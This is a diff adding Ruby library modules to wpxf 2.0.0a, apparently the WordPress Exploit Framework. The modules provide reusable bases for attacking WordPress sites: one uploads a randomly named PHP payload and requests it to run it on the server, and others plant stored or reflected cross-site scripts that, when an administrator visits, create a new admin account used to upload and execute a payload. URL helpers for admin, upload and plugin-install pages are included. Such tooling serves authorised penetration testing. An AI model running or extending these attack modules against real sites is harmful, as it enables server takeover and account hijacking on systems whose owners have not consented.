wpxf 2.0.0a

data/lib/wpxf/wordpress/posts.rb

@@ -0,0 +1,26 @@
+# frozen_string_literal: true
+
+# Provides helper functions for interacting with posts.
+module Wpxf::WordPress::Posts
+  # Get the post ID from a post body.
+  # @param body [String] the body of a post.
+  # @return [String,nil] the post ID, nil when nothing found.
+  def get_post_id_from_body(body)
+    return nil unless body
+    res = body.match(/<body class="[^=]*postid-(\d+)[^=]*">/i)
+    if res && res[1]
+      emit_info "Found post #{res[1]}", true
+      return res[1]
+    end
+    nil
+  end
+
+  # Get the post ID from a permalink.
+  # @param url [String] the permalink of the post.
+  # @return [String,nil] the post ID, nil when nothing found.
+  def get_post_id_from_permalink(url)
+    res = execute_get_request(url: url)
+    return nil unless res && res.code == 200
+    get_post_id_from_body(res.body)
+  end
+end

data/lib/wpxf/wordpress/reflected_xss.rb

@@ -0,0 +1,40 @@
+# frozen_string_literal: true
+
+# Provides reusable functionality for reflected XSS modules.
+module Wpxf::WordPress::ReflectedXss
+  include Wpxf::WordPress::Xss
+
+  # Initialize a new instance of {ReflectedXss}.
+  def initialize
+    super
+    @success = false
+    _update_info_without_validation(
+      desc: %(
+        This module prepares a payload and link that can be sent
+        to an admin user which when visited with a valid session
+        will create a new admin user which will be used to upload
+        and execute the selected payload in the context of the
+        web server.
+      )
+    )
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    unless respond_to? 'url_with_xss'
+      raise 'Required method "url_with_xss" has not been implemented'
+    end
+
+    return false unless super
+    return true if aux_module?
+
+    emit_info 'Provide the URL below to the victim to begin the payload upload'
+    puts
+    puts url_with_xss
+    puts
+
+    start_http_server
+    @success
+  end
+end

data/lib/wpxf/wordpress/shell_upload.rb

@@ -0,0 +1,172 @@
+# frozen_string_literal: true
+
+# Provides reusable functionality for shell upload modules.
+module Wpxf::WordPress::ShellUpload
+  include Wpxf
+
+  # Initialize a new instance of {ShellUpload}
+  def initialize
+    super
+
+    @session_cookie = nil
+    @upload_result = nil
+    @payload_name = nil
+
+    _update_info_without_validation(
+      desc: %(
+        This module exploits a file upload vulnerability
+        which allows users to upload and execute PHP
+        scripts in the context of the web server.
+      )
+    )
+
+    register_advanced_options([
+      IntegerOption.new(
+        name: 'payload_name_length',
+        desc: 'The number of characters to use when generating the payload name',
+        required: true,
+        default: rand(5..10),
+        min: 1,
+        max: 256
+      )
+    ])
+  end
+
+  # @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the upload operation.
+  def upload_result
+    @upload_result
+  end
+
+  # @return [String] the file name of the payload, including the file extension.
+  def payload_name
+    @payload_name
+  end
+
+  # @return [String] the URL of the file used to upload the payload.
+  def uploader_url
+    nil
+  end
+
+  # @return [BodyBuilder] the {Wpxf::Utility::BodyBuilder} used to generate the uploader form.
+  def payload_body_builder
+    nil
+  end
+
+  # @return [String] the URL of the payload after it is uploaded to the target.
+  def uploaded_payload_location
+    nil
+  end
+
+  # @return [Array] an array of possible locations that the payload could have been uploaded to.
+  def possible_payload_upload_locations
+    nil
+  end
+
+  # Called prior to preparing and uploading the payload.
+  # @return [Boolean] true if no errors occurred.
+  def before_upload
+    true
+  end
+
+  # @return [Integer] the response code to expect from a successful upload operation.
+  def expected_upload_response_code
+    200
+  end
+
+  # @return [Hash] the query string parameters to use when submitting the upload request.
+  def upload_request_params
+    nil
+  end
+
+  # @return [String] the extension type to use when generating the payload name.
+  def payload_name_extension
+    'php'
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    return false unless super
+    return false unless before_upload
+
+    emit_info 'Preparing payload...'
+    @payload_name = "#{Utility::Text.rand_alpha(_payload_name_length)}.#{payload_name_extension}"
+    builder = payload_body_builder
+    return false unless builder
+
+    emit_info 'Uploading payload...'
+    return false unless _upload_payload(builder)
+
+    emit_info 'Executing the payload...'
+    _validate_and_prepare_upload_locations.each do |payload_url|
+      break if execute_payload(payload_url)&.code != 404
+    end
+
+    true
+  end
+
+  # @return [Boolean] true if the result of the upload operation is valid.
+  def validate_upload_result
+    true
+  end
+
+  # Execute the payload at the specified address.
+  # @param payload_url [String] the payload URL to access.
+  # @return [HttpResponse] the HTTP response of the request to the payload URL.
+  def execute_payload(payload_url)
+    res = execute_get_request(url: payload_url, cookie: @session_cookie)
+    emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
+    res
+  end
+
+  # @return [Integer] the number of seconds to adjust the upload timestamp range start and end values by.
+  def timestamp_range_adjustment_value
+    10
+  end
+
+  # @return [Array] the range of possible timestamps that could have been used when the payload reached the target.
+  def upload_timestamp_range
+    (@start_timestamp - timestamp_range_adjustment_value)..(@end_timestamp + timestamp_range_adjustment_value)
+  end
+
+  private
+
+  def _validate_and_prepare_upload_locations
+    payload_urls = possible_payload_upload_locations
+    return payload_urls unless payload_urls.nil?
+
+    payload_url = uploaded_payload_location
+    return false unless payload_url
+
+    emit_success "Uploaded the payload to #{payload_url}", true
+    [].push(payload_url)
+  end
+
+  def _payload_name_length
+    normalized_option_value('payload_name_length')
+  end
+
+  def _upload_payload(builder)
+    @start_timestamp = Time.now.to_i
+
+    builder.create do |body|
+      @upload_result = execute_post_request(url: uploader_url, params: upload_request_params, body: body, cookie: @session_cookie)
+    end
+
+    @end_timestamp = Time.now.to_i
+
+    if @upload_result.nil? || @upload_result.timed_out?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if @upload_result.code != expected_upload_response_code
+      emit_info "Response code: #{@upload_result.code}", true
+      emit_info "Response body: #{@upload_result.body}", true
+      emit_error 'Failed to upload payload'
+      return false
+    end
+
+    validate_upload_result
+  end
+end

data/lib/wpxf/wordpress/staged_reflected_xss.rb

@@ -0,0 +1,82 @@
+# frozen_string_literal: true
+
+# Provides reusable functionality for reflected XSS modules.
+module Wpxf::WordPress::StagedReflectedXss
+  include Wpxf::WordPress::ReflectedXss
+
+  # Initialize a new instance of {StagedReflectedXss}.
+  def initialize
+    super
+    register_option(
+      StringOption.new(
+        name: 'initial_req_path',
+        desc: 'The path to be used to identify the initial request',
+        required: true,
+        default: Utility::Text.rand_alpha(rand(5..10))
+      )
+    )
+  end
+
+  # @return [String] the path to use for the initial request.
+  def initial_req_path
+    normalized_option_value('initial_req_path')
+  end
+
+  # Invoked when a HTTP request is made to the server.
+  # @param path [String] the path requested.
+  # @param params [Hash] the query string parameters.
+  # @param headers [Hash] the HTTP headers.
+  # @return [String] the response body to send to the client.
+  def on_http_request(path, params, headers)
+    if path.eql? normalize_uri(xss_path, initial_req_path)
+      emit_info 'Initial request received...'
+      { type: 'text/html', body: initial_script }
+    else
+      super
+    end
+  end
+
+  # @return [String] the URL to send the user to which contains the XSS vector.
+  def url_with_xss
+    normalize_uri(xss_url, initial_req_path)
+  end
+
+  # @return [String] the initial script that should be served to automate a form submission to the vulnerable page.
+  def initial_script
+    nil
+  end
+
+  # Create a basic POST script with the specified fields. All values in the script will be wrapped in double quotes.
+  # @param url [String] the vulnerable URL.
+  # @param fields [Hash] the fields and values to inject into the script.
+  def create_basic_post_script(url, fields)
+    json = ''
+    fields.each_with_index do |(k, v), i|
+      if i < fields.size - 1
+        json += "\"#{k}\": \"#{v}\",\n"
+        next
+      end
+
+      json += "\"#{k}\": \"#{v}\"\n"
+    end
+
+    %|
+      <html><head></head><body><script>
+        #{js_post}
+        post('#{url}', {
+          #{json}
+        });
+      </script></body></html>
+    |
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    if initial_script.nil?
+      raise 'Required method "initial_script" has not been implemented'
+    end
+
+    super
+  end
+end

data/lib/wpxf/wordpress/stored_xss.rb

@@ -0,0 +1,73 @@
+# frozen_string_literal: true
+
+# Provides reusable functionality for stored XSS modules.
+module Wpxf::WordPress::StoredXss
+  include Wpxf::WordPress::Xss
+
+  # Initialize a new instance of {StoredXss}.
+  def initialize
+    super
+    @success = false
+    _update_info_without_validation(
+      desc: %(
+        This module stores a script in the target system that
+        will execute when an admin user views the vulnerable page,
+        which in turn, will create a new admin user to upload
+        and execute the selected payload in the context of the
+        web server.
+      )
+    )
+  end
+
+  # @return [String] the URL or name of the page an admin user must view to execute the script.
+  def vulnerable_page
+    'a vulnerable page'
+  end
+
+  # Abstract method which must be implemented to store the XSS include script.
+  # @return [Wpxf::Net::HttpResponse] the HTTP response to the request to store the script.
+  def store_script
+    raise 'Required method "store_script" has not been implemented'
+  end
+
+  # Call {store_script} and validate the response.
+  # @return [Boolean] return true if the script was successfully stored.
+  def store_script_and_validate
+    res = store_script
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    return true if res.code == expected_status_code_after_store
+
+    emit_error "Server responded with code #{res.code}"
+    false
+  end
+
+  # Execute all tasks required before storing the script.
+  # @return [Boolean] return true if the prerequisite actions were successfully executed.
+  def before_store
+    true
+  end
+
+  # @return [Number] The status code that is expected after storing the script.
+  def expected_status_code_after_store
+    200
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    return false unless super && before_store
+
+    emit_info 'Storing script...'
+    return false unless store_script_and_validate
+
+    emit_success "Script stored and will be executed when a user views #{vulnerable_page}"
+    start_http_server
+
+    xss_shell_success
+  end
+end

data/lib/wpxf/wordpress/urls.rb

@@ -0,0 +1,131 @@
+# frozen_string_literal: true
+
+# Provides helper methods for generating commonly used WordPress URLs.
+module Wpxf::WordPress::Urls
+  # @return [String] the WordPress login URL.
+  def wordpress_url_login
+    normalize_uri(full_uri, 'wp-login.php')
+  end
+
+  # @param post_id [Integer] a valid WordPress post ID.
+  # @return [String] the URL of the specified WordPress post.
+  def wordpress_url_post(post_id)
+    normalize_uri(full_uri, "?p=#{post_id}")
+  end
+
+  # @param author_id [Integer] a valid WordPress author ID.
+  # @return [String] the WordPress author URL.
+  def wordpress_url_author(author_id)
+    normalize_uri(full_uri, "?author=#{author_id}")
+  end
+
+  # @return [String] the WordPress RSS URL.
+  def wordpress_url_rss
+    normalize_uri(full_uri, '?feed=rss2')
+  end
+
+  # @return [String] the WordPress RDF URL.
+  def wordpress_url_rdf
+    normalize_uri(full_uri, 'feed/rdf/')
+  end
+
+  # @return [String] the WordPress ATOM URL.
+  def wordpress_url_atom
+    normalize_uri(full_uri, 'feed/atom/')
+  end
+
+  # @return [String] the WordPress readme file URL.
+  def wordpress_url_readme
+    normalize_uri(full_uri, 'readme.html')
+  end
+
+  # @return [String] the WordPress sitemap URL.
+  def wordpress_url_sitemap
+    normalize_uri(full_uri, 'sitemap.xml')
+  end
+
+  # @return [String] the WordPress OPML URL.
+  def wordpress_url_opml
+    normalize_uri(full_uri, 'wp-links-opml.php')
+  end
+
+  # @return [String] the WordPress admin URL.
+  def wordpress_url_admin
+    normalize_uri(full_uri, 'wp-admin/')
+  end
+
+  # @return [String] the WordPress admin AJAX URL.
+  def wordpress_url_admin_ajax
+    normalize_uri(wordpress_url_admin, 'admin-ajax.php')
+  end
+
+  # @return [String] the WordPress admin post URL.
+  def wordpress_url_admin_post
+    normalize_uri(wordpress_url_admin, 'admin-post.php')
+  end
+
+  # @return [String] the WordPress admin update URL.
+  def wordpress_url_admin_update
+    normalize_uri(wordpress_url_admin, 'update.php')
+  end
+
+  # @return [String] the WordPress wp-content URL.
+  def wordpress_url_wp_content
+    normalize_uri(full_uri, wp_content_dir)
+  end
+
+  # @return [String] the WordPress plugins URL.
+  def wordpress_url_plugins
+    normalize_uri(wordpress_url_wp_content, 'plugins')
+  end
+
+  # @return [String] the WordPress themes URL.
+  def wordpress_url_themes
+    normalize_uri(wordpress_url_wp_content, 'themes')
+  end
+
+  # @return [String] the WordPress XMLRPC URL.
+  def wordpress_url_xmlrpc
+    normalize_uri(full_uri, 'xmlrpc.php')
+  end
+
+  # @return [String] the WordPress plugin install URL.
+  def wordpress_url_plugin_install
+    normalize_uri(wordpress_url_admin, 'plugin-install.php')
+  end
+
+  # @return [String] the WordPress plugin uploader URL.
+  def wordpress_url_plugin_upload
+    normalize_uri(wordpress_url_admin, 'plugin-install.php?tab=upload')
+  end
+
+  # @return [String] the WordPress new user URL.
+  def wordpress_url_new_user
+    normalize_uri(wordpress_url_admin, 'user-new.php')
+  end
+
+  # @return [String] the WordPress uploads directory.
+  def wordpress_url_uploads
+    normalize_uri(wordpress_url_wp_content, 'uploads')
+  end
+
+  # @return [String] the edit profile page URL.
+  def wordpress_url_admin_profile
+    normalize_uri(wordpress_url_admin, 'profile.php')
+  end
+
+  # @return [String] the base path of the REST API introduced in WordPress 4.7.0.
+  def wordpress_url_rest_api
+    normalize_uri(full_uri, 'wp-json')
+  end
+
+  # @return [String] the comment poster URL.
+  def wordpress_url_comments_post
+    normalize_uri(full_uri, 'wp-comments-post.php')
+  end
+
+  # @return [String] the admin / plugin options URL.
+  def wordpress_url_admin_options
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+end